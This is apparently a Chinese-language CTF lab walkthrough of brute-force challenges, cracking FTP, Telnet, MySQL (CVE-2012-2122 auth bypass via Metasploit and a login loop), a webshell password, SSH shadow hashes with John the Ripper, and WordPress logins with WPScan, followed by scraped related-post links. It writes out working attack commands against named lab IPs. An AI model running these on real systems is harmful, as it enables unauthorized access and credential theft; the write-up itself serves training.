ftp服务破解

给出了IP,还提供了一个字典文件,直接拿这个字典来爆破就完事儿了(但是这里只提供密码呀,所以得自己找常见用户名字典了)。

使用超级弱口令爆破工具

直接爆破

得到账号密码后,使用浏览器登录ftp服务器

下载flag文件获取flag

Telnet服务破解

使用kali系统自带得hyrad工具,暴力破解telnet账号密码

回到win系统,打开命令窗口

telnet www.whalwl.fun 2323

Mysql暴力破解

初看题目,发现是暴力破解,然后我果断运用了kali的hyrad工具,发现爆破失败。哎,这不是暴力破解吗?于是我又回来仔细看了一下题目,发现题目提示:利用mysql漏洞

上网查了查,发现是Mysql 身份认证绕过漏洞(CVE-2012-2122)

简介:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值(memcmp函数主要是用来对比字符串的),也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

这里我 运用两种方法进行漏洞利用。

第一种:打开kali采用msfconsole中的模块进行漏洞验证,然后解hash就可以看到密码,得到密码后,可以利用数据库连接工具进行连接(这里我不做演示)

使用命令:
msfcnsole        #进入msf模块
use mysql_authbypass_hashdump   #使用漏洞工具模块
show options      #查看选项
set RHOSTS   118.190.133.35   #设置目标ip
set RPORT    3308             #设置目标端口
run                           #执行

第二种方法:利用for循环,不断的向目标发送请求。

for i in `seq 1 1000`; do mysql -uroot -p123456 -h 118.190.133.35 -P3308 ; done

寻找flag

登陆表单破解

下载提供的用户密码,分别爆破用户密码,然后登录即可

一句话密码破解

这里一句话破解是破解网站shell密码,所以得到网址后,我们扫描一下目录,发现存在robots.txt文件,我们打开看一下,发现存在许多文件,我发现/.webconsole.php文件最可疑,我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码)下载地址:K8tools/K8_FuckOneShell_20161224%5BK.8%5D.rar at 78dd750a11258b803c2a0f1a2dcdcbffc1834148 · fan-ch/K8tools · GitHub然后我们下载靶场提供的字典,把字典粘贴到K8_FuckOneShell同文件目录下。

得到密码后,我们用菜刀连接一下看看,在根目录找到flag

SSH离线破解

我们利用john工具进行破解。

john工具介绍:John the Ripper是一个流行的口令破解工具,它支持Windows和Linux平台,是一个开源软件。

常用命令:
john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
john ./shadow   -->不指定字典,直接拿john提供的字典来爆破shadow文件。
john --show ./shadow -->查上次爆破结果,在shadow文件中。

/etc/shadow 文件,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”,并且只有 root 用户拥有读权限,其他用户是没有任何权限的。

我们使用root用户查看一下shadow文件

shadow文件中每行代表一个用户,同样使用 ":" 作为分隔符,不同之处在于,每行用户信息被划分为 9 个字段。每个字段的含义如下:

用户名:加密密码:最后一次修改时间:最小修改时间间隔:密码有效期:密码需要变更前的警告天数:密码过期后的宽限时间:账号失效时间:保留字段

具体shadow文件解析请看:Linux /etc/shadow(影子文件)内容解析(超详细)

我们下载靶场提供的字典,分析shadow文件,test是用户名,从$6$看出他是通过SHA-512来进行加密的

test:$6$Vt6D0jvyawaHX1mT$7mD9IvHMBm3jhaEv5H5euXSeqEx1s1TzRCfe7FxMcDU5w2HFpvpUloseOSawFWg81oqp4qU2EWUMGuDNSFZeu.:18833:0:99999:7:::

然后我们使用命令破解(自行百度安装john工具)

第一步破解密码
john --w:john_dict.txt --format=sha512crypt shadow
--w:表示字典文件
--fromat:表示预定义密码破解的类型 DES/BSDI/MD5/BF/AFS/LM/
sha512crypt:表示SHA512散列的密码,用于解密
第二步查找密码
备注:破解过的用户的密码保存在/home文件夹下的隐藏文件./john/john.pot里cat /home/kali/.john/john.pot

使用kali连接服务器,发现连接不成功,不知道为啥。

然后换finalshell或者xshell登录。

使用命令find / "*this_is_flag*" 查找flag,使用命令cat /this_is_flag

john是离线爆破,

我们也可以使用hydra在线爆破,我们只需密码字典够大就可以爆破(题目提示我们不能在线爆破,服务器抗不住,但是我们可以把线程调到最小嘛)

hydra命令:

hydra -l test -P ./pass.txt ssh://118.190.133.35:22000

wordpress后台破解

尝试用burp爆破,发现爆破一段时间后状态马变成500了,说明使用burp爆破行不通。

于是我们使用工具wpscan来进行破解。

wpscan工具简介:

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。

常见用法:

wpscan --update           #更新到最新版本
wpscan --url  http://xxxx.com    #扫描网站
wpscan --url  http://xxxx.com  --enumerate -u   #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名,默认从1-10
u[10-20] 枚举用户名,配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件,时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题
wpscan  --url http://xxxx.com --username '用户名' -P 字典.txt  #已知用户名,使用字典爆破密码
wpscan  --url http://xxxx.com  -P password.txt -U username.txt  #同时爆破用户名及密码

拿着账号密码去登录即可拿到flag。

安鸾靶场--暴力破解相关推荐

  1. Pikachu靶场-暴力破解

    1.暴力破解 1.Burte Force(暴力破解)概述 Burte Force(暴力破解)概述 "暴力破解"是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息 ...

  2. Pikachu靶场暴力破解通关

    目录 字典获取 BP四种攻击模式 一.Sniper(狙击手模式) 二.Battering ram(攻城锤模式) 三.Pitchfork(叉子模式) 四.Cluster bomb(炸弹模式) 靶场练习 ...

  3. pikachu靶场暴力破解专题

     一.前言 pikachu是我作为初探渗透的平台,所以我会在每个专题前增加更多的基础知识,一是方便自己巩固基础,二是帮助一些也打算入门渗透的小白更好的理解. 二.暴力破解 pikachu靶场里给出的暴 ...

  4. pikachu靶场 暴力破解

    目录 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? 基于表单的暴力破解 这一关没有防护,直接开始攻击过程 开启抓包,输入用户名admin, ...

  5. Pikachu靶场暴力破解关卡3

    这是暴力破解关卡的第三关on client 正常做题思路 首先输入username,按提交看页面的显示 提示请输入验证码 接着输入password继续点击登录 又是请输入验证码 接着输入错误的验证码看 ...

  6. 安鸾靶场之XSS漏洞_交友平台

    本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考链接:MD5截断比较验证 - Ye'sBlog - ...

  7. 安鸾靶场-LFI本地文件包含 LFI本地文件包含LF2 文件包含漏洞练习记录

    记得几个月刚接触CTF就遇到了一个文件包含漏洞题目 i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞_AAAAAAAAAAAA66的博客-CSDN博客 记得当时的想法就是既然啥也不会 ...

  8. pikachu靶场通关之暴力破解

    暴力破解 攻击者在不知道目标系统的账号密码的情况下,一种对目标系统尝试性的登录 连续性尝试+字典=自动化 字典 一个有效的字典,可以大大提高暴力破解的效率 字典会在下篇文章分享 如果一个网站没有对登录 ...

  9. 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)

    一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...

  10. WEB安全实战(带靶场)–暴力破解

    WEB安全实战(带靶场)–暴力破解 靶场一:DVWA中的暴力破解 靶场二:靶场实验 暴力破解 暴力破解百度云链接(失效请在评论区通知) 链接:https://pan.baidu.com/s/1FcNF ...

最新文章

  1. mysql中begin end中变量定义_DECLARE只能用于BEGIN…END的开头部分定义局部变量,其作用范围只能在该BEGIN…END中。_学小易找答案...
  2. 计算机系统数据保存期限,官方数据:U盘数据通常可以保存多长时间
  3. linux php ftp扩展,Linux中如何安装 PHP 扩展?(方法介绍)
  4. java jolt调用tuxedo_Jolt调用Tuxedo服务,该怎么处理
  5. win7 下配置 Qt5.1 for Android
  6. set的用法及短语_人教版九全Unit 14重点短语、重点句型、课文讲解
  7. 使用光标查询10部门的员工姓名和工资,并打印__使用光标查询员工姓名和工资,并打印
  8. c++中多线程传递参数原理分析
  9. 关于配置环境变量相关解答
  10. 【实习之T100开发】T100 单档程序开发(1)开发流程
  11. python画十字_matplotlib绘制鼠标的十字光标的实现(内置方式)
  12. CentOS 6.5静态IP的设置(NAT和桥接联网方式都适用)
  13. 十天学会单片机(2)点亮一个发光管
  14. html里的底部c怎么打出来,版权所属符号-网站底部版权符号怎么打出来
  15. ARM Cortex M3处理器概述
  16. 云效首发应用交付和项目协作新品,助力企业DevOps到BizDevOps
  17. 【JavaScript 逆向】极验四代无感验证码逆向分析
  18. Android Camera相机开发示例、Android 开发板 USB摄像头采集、定期拍照、定时拍照,安卓调用摄像头拍照、Android摄像头预览、监控,USB摄像头开发、摄像头监控代码
  19. MySQL数据库字符串(单行)函数#concat、length、tirm、replace、strcmp、substr等函数总结
  20. [Linux]常见环境开发工具

热门文章

  1. 中国宽带可调谐飞秒激光器行业市场供需与战略研究报告
  2. FPGA、MCU(stm3251)驱动VGA显示器_电阻分压法硬件设计_VGA电阻网络分压
  3. 计算机协会取消信息学奥赛,15万人参加的信息学奥赛停了 学生咋办家长咋看?...
  4. 如何在Ubuntu18.4中设置ERPNEXT开源ERP生产环境开机运行
  5. python解决八数码问题_python八数码
  6. 合同管理系统操作手册
  7. MySQL的索引与事务(面试必考) - 细节狂魔
  8. 健康知识api根据健康知识ID查询详细信息
  9. Golang 协程 跟Java NIO
  10. C#使用SHA1加密类(RSAFromPkcs8)支持1024位和2048位私钥